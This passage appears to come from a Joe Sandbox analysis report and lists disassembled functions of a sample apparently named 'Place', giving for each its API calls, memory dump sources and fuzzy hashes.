Instruction ID: 7a37280e12c212bee360d846b70543c3e468f8cceed64af4a8b057113734016e
Opcode Fuzzy Hash: bb5a6fe0f9d5a5001d77969fa14baca4ba0e4141f7e3b27f4c7f04fc1da3aa0d
Instruction Fuzzy Hash: 7501D235201B06EFE7152734A816E6F3B49BF83770F110427F515AE192EEB08D40C661

Function 005E92C8 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 005E92D6

Part of subcall function 005A2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,005A9C54,00000000,005A8D5D,005A59C3), ref: 005A2F99
Part of subcall function 005A2F85: GetLastError.KERNEL32(00000000,?,005A9C54,00000000,005A8D5D,005A59C3), ref: 005A2FAB

_free.LIBCMT ref: 005E92E7
_free.LIBCMT ref: 005E92F9

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
Instruction ID: 2bd42b7fee1d3910bf037b8559b8434f0007f79736c206d5e777c9224f25b765
Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
Instruction Fuzzy Hash: 0AE0C2A12047035BCE28AA3D6846E877FEC2FC8311B14040DB549D3542CE20E8808028

Function 00585E83 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 551COMMON

Download Yara Rule

Strings

CALL, xrefs: 005BE234

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 2d1570b42bdfc1b720004afaa59ec03956eeb87460ce45a22636d9a44268cd27
Instruction ID: 7e122a577a84601d2f09b2f144ca4bb0912b17104a5c4a579865c3a8305e0a92
Opcode Fuzzy Hash: 2d1570b42bdfc1b720004afaa59ec03956eeb87460ce45a22636d9a44268cd27
Instruction Fuzzy Hash: 68325B74508342DFDB24EF14C499A6ABFE1BF84304F15896DE886AB362D735EC45CB82

Function 005FE139 Relevance: 3.2, APIs: 2, Instructions: 227COMMON

Download Yara Rule

APIs

_strcat.LIBCMT ref: 005FE20C

Part of subcall function 00584D37: __itow.LIBCMT ref: 00584D62
Part of subcall function 00584D37: __swprintf.LIBCMT ref: 00584DAC

_wcscpy.LIBCMT ref: 005FE29B

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: __itow__swprintf_strcat_wcscpy
String ID:
API String ID: 1012013722-0
Opcode ID: 7fd64883f83df6b1963257a6b3767b383437996d1655b2eca80064ea13e2a962
Instruction ID: 0755589d79ac95faa83be175cdf804a43a81c908b415215bfdcec1a86b7694e8
Opcode Fuzzy Hash: 7fd64883f83df6b1963257a6b3767b383437996d1655b2eca80064ea13e2a962
Instruction Fuzzy Hash: 81912735A00505DFCB18EF18C58A96DBBE5FF89310B55845AE90A9F3A2EB34ED41CB81

Function 005E6135 Relevance: 3.1, APIs: 2, Instructions: 142COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 005E614E

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: BuffCharLower
String ID:
API String ID: 2358735015-0
Opcode ID: d64eca8c98c18fe6cf70a3e66f5252a0cf3c55599d57d71d3841d63b958f983c
Instruction ID: 78ac42d4c1150aceeb54152e6c3fe9118cfc5e9c500dcee5782ce9ec26f62b0c
Opcode Fuzzy Hash: d64eca8c98c18fe6cf70a3e66f5252a0cf3c55599d57d71d3841d63b958f983c
Instruction Fuzzy Hash: EF41FB7690024A9FDB19DF65C8858AEBBB9FF943D0B10453EE596D7241EB30DE40CB50

Function 005E7D6E Relevance: 3.1, APIs: 2, Instructions: 133COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 005E7E96

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 5494bf0a0b3f304d048f6ad855e7f64c9f1cfdefcb4228e15d96b3c10cbc24cc
Instruction ID: 04c241bbb4a16dfbd748f3c50a48af4dbe95cba07741df363146afd3a95dd495
Opcode Fuzzy Hash: 5494bf0a0b3f304d048f6ad855e7f64c9f1cfdefcb4228e15d96b3c10cbc24cc
Instruction Fuzzy Hash: A841D37250824E9FDB14EFB9998597EBFACFF4D340B284899E5C597281DB319C01CB60

Function 00595F8B Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00595FEF

Part of subcall function 005A359C: __lock.LIBCMT ref: 005A35A2
Part of subcall function 005A359C: DecodePointer.KERNEL32(00000001,?,00596004,005D8892), ref: 005A35AE
Part of subcall function 005A359C: EncodePointer.KERNEL32(?,?,00596004,005D8892), ref: 005A35B9

Part of subcall function 00595F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00595F18
Part of subcall function 00595F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00595F2D

Part of subcall function 00595240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0059526C
Part of subcall function 00595240: IsDebuggerPresent.KERNEL32 ref: 0059527E
Part of subcall function 00595240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 005952E6
Part of subcall function 00595240: SetCurrentDirectoryW.KERNEL32(?), ref: 00595366

SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 0059602F

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 060b3bf5df68fad57e561911027f19613edbc615a55dfd948ff3c0f7a134ae45
Instruction ID: a5588d511b69e28103fcfea7ffba80e790b0cd4a87e8c6b40d9234301617e8de
Opcode Fuzzy Hash: 060b3bf5df68fad57e561911027f19613edbc615a55dfd948ff3c0f7a134ae45
Instruction Fuzzy Hash: 75118E758083029BC711EF69EC4994EBFE9FF8A350F00491AF444972A1EBB09648CF91

Function 005A581D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 005A584C
__lock_file.LIBCMT ref: 005A586D

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 927b3aeee30dbcc0c065d11eebd35daac8ea5683073ca11bec89f87c6d57c7c3
Instruction ID: 2c62fdeb80176a49ea3d4be9c11d28b1777be830a49951baa6713aaacc92dfbd
Opcode Fuzzy Hash: 927b3aeee30dbcc0c065d11eebd35daac8ea5683073ca11bec89f87c6d57c7c3
Instruction Fuzzy Hash: 5101217180064BEBCF11AF658C09D9E7F61BFC2760F284115F8246B1A1EB358A21DB91

Function 005A55C6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 005A8D58: __getptd_noexit.LIBCMT ref: 005A8D58

__lock_file.LIBCMT ref: 005A560B

Part of subcall function 005A6E3E: __lock.LIBCMT ref: 005A6E61

__fclose_nolock.LIBCMT ref: 005A5616

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 1f73b0ec48d4ee5e12074ad1ee5134008f158f60c46ea1356d31f582dc4f36e4
Instruction ID: d757a3a50dfe1b7357a66e25255eaf18d463a423061053be96ea356efb513405
Opcode Fuzzy Hash: 1f73b0ec48d4ee5e12074ad1ee5134008f158f60c46ea1356d31f582dc4f36e4
Instruction Fuzzy Hash: 51F0B471C01B069AD710AB79880AF6E7FA17F83334F158209F424AB1C1DF7C89019F51

Function 005A5E80 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 005A5EB4
__ftell_nolock.LIBCMT ref: 005A5EBF

Part of subcall function 005A8D58: __getptd_noexit.LIBCMT ref: 005A8D58

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: __ftell_nolock__getptd_noexit__lock_file
String ID:
API String ID: 2999321469-0
Opcode ID: 33c073eb90fdf3aa9b0f87b3c58a31926afe0c3b51528aa5dd3797762abeb790
Instruction ID: 3f6b8d466b1f36c5bff3c001cbb899de2a65eb40abaf916a4b139fc67735f24b
Opcode Fuzzy Hash: 33c073eb90fdf3aa9b0f87b3c58a31926afe0c3b51528aa5dd3797762abeb790
Instruction Fuzzy Hash: 04F0EC3291161BAED700BB74880BB6E7E947F83331F114245F420BB1C1DF784E019B51

Function 00595AC3 Relevance: 3.0, APIs: 2, Instructions: 25windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00595AEF
Shell_NotifyIconW.SHELL32(00000002,?), ref: 00595B1F

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: 795a08fa07962d010256ff3aab53cefd02f38a2eb4a3c3e28dc6f3d4828ca21d
Instruction ID: b2c587a536a100bd5ec4ef6b1998d1348e32dc10f07713947aa2b89812efc102
Opcode Fuzzy Hash: 795a08fa07962d010256ff3aab53cefd02f38a2eb4a3c3e28dc6f3d4828ca21d
Instruction Fuzzy Hash: ACF0A7708083089FDB928B24DC497DA7BBCA70130CF0002EAFA4896292D7B10B88CF55

Function 005A0E38 Relevance: 2.6, APIs: 2, Instructions: 94sleepCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 005A0ED5
Sleep.KERNEL32 ref: 005A0EE7

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: CloseHandleSleep
String ID:
API String ID: 252777609-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 72e31dca6ebee84af72889ecc11156d6b1e17ea3c57931000cf0545e81950e58
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 2331C571A10109DFDB18DF58C48096DFBAAFF5A310B649AA5E409DB291E731EDC1DBC0

Function 005FC355 Relevance: 1.8, APIs: 1, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: LoadString$__swprintf
String ID:
API String ID: 207118244-0
Opcode ID: c8c0f254a6f926eedd08c9d1b62168e7fc79a8ea08ba83533b76c0dc3ba76b1f
Instruction ID: 853191644e68c800b89d29ed7b4f96375f46f72590fc68ac66c3c63889832091
Opcode Fuzzy Hash: c8c0f254a6f926eedd08c9d1b62168e7fc79a8ea08ba83533b76c0dc3ba76b1f
Instruction Fuzzy Hash: 9BB12834A0410EDFCF14EF98C9559BEBFB5FF88710F10812AE915AB291EB74A941CB90

Function 0058A820 Relevance: 1.7, APIs: 1, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08a5d716cb8ee23ff2c9e462a2bacff97a839bde81f2ce4053f150bf89535b42
Instruction ID: 72154649add48b02e0aee4e46db9cfce4596719b6c11b2088f5a37e9bb8e2b0e
Opcode Fuzzy Hash: 08a5d716cb8ee23ff2c9e462a2bacff97a839bde81f2ce4053f150bf89535b42
Instruction Fuzzy Hash: 96619B706046069FEB10EF54C885F7ABBA5FF44300F15846EED16AB291E774ED81CB62

Function 0059343F Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0059351A

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 719ee5b0fa6b9ba4850e2a8071915d723d28199ea914ec437d6a439a6195b7a7
Instruction ID: c141ccdd8e220974ee42d1d2adc902ea411d3cf4f00ff6a3867117ba2d19a7f2
Opcode Fuzzy Hash: 719ee5b0fa6b9ba4850e2a8071915d723d28199ea914ec437d6a439a6195b7a7
Instruction Fuzzy Hash: C831A179604A02DFCF24DF18D498A25FBE0FF49350B15C56AE98A8B791E730ED81CB94

Function 005FDD32 Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 005FDE3C

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 407fe143e9ef5c38afe96e0ece1df3e8aa3f639c1db4b514519b5bf0ff382b0b
Instruction ID: cdd893d6868729c256916c8590e0932c87cd9b19229ff1e469bf1f7d48b8a0b1
Opcode Fuzzy Hash: 407fe143e9ef5c38afe96e0ece1df3e8aa3f639c1db4b514519b5bf0ff382b0b
Instruction Fuzzy Hash: D7319E35504519DFCB00AF00D085A7ABFB6FF95320F10888AEE995F381DB74A841CFA1

Function 005BE2DF Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 005BE2EA

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 86d9450437a4039dc0a0cb2260ff7257a4983710e71349d22297f30bfd9ded3a
Instruction ID: 05e36ffca91bc093ebcc0fe268d495993da2d5ba1f359afd020b18a530580bbd
Opcode Fuzzy Hash: 86d9450437a4039dc0a0cb2260ff7257a4983710e71349d22297f30bfd9ded3a
Instruction Fuzzy Hash: B741F574508341CFDB14DF14C489B5ABBE1BF85318F0989ACE88A9B362C372E885CB52

Function 005949C2 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00594B29: FreeLibrary.KERNEL32(00000000,?), ref: 00594B63

Part of subcall function 005A547B: __wfsopen.LIBCMT ref: 005A5486

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,005927AF,?,00000001), ref: 005949F4

Part of subcall function 00594ADE: FreeLibrary.KERNEL32(00000000), ref: 00594B18

Part of subcall function 005948B0: _memmove.LIBCMT ref: 005948FA

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 850d8d9b3738fc89f20f43bee97654067a1e78338a157e6ddcdf6476019c9cab
Instruction ID: 820169177de74af6cf3efb1b2ab805d823902babab9927f65e0a68a1ac75fcc0
Opcode Fuzzy Hash: 850d8d9b3738fc89f20f43bee97654067a1e78338a157e6ddcdf6476019c9cab
Instruction Fuzzy Hash: AB11EB31650206ABDF14FB74CC0AFAE7BAABF80701F10441AF541A61C1EE709E52AF94

Function 00591BCC Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00591BFE

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: d3511936f2c3a9f0ed1f08c39fcca023c8dcb164a1ab07be1a9a79502957a79d
Instruction ID: 4c5182841f63bb75778f1160fbf7a752fa2ed3cf27e85af8ce9c276314ce12e9
Opcode Fuzzy Hash: d3511936f2c3a9f0ed1f08c39fcca023c8dcb164a1ab07be1a9a79502957a79d
Instruction Fuzzy Hash: 8A114C76204A02DFCB24CF28D485916BBE9FF49350B20C82EE48ACB261E732E841CB54

Function 005BE3C2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 005BE3CE

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: e62d480dd565d3efd9287cb796889e1bc3aa13c21997a8716f11610f30e3feb8
Instruction ID: baf1df0c72adca91c5ee6033670d2da48f2c8c23f89a27f781decee53c82fc92
Opcode Fuzzy Hash: e62d480dd565d3efd9287cb796889e1bc3aa13c21997a8716f11610f30e3feb8
Instruction Fuzzy Hash: 0E211374508341DFDB14EF54C448B5ABBE1BF84304F098968F88A67322D331E849CB92

Function 00591A36 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00591A77

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
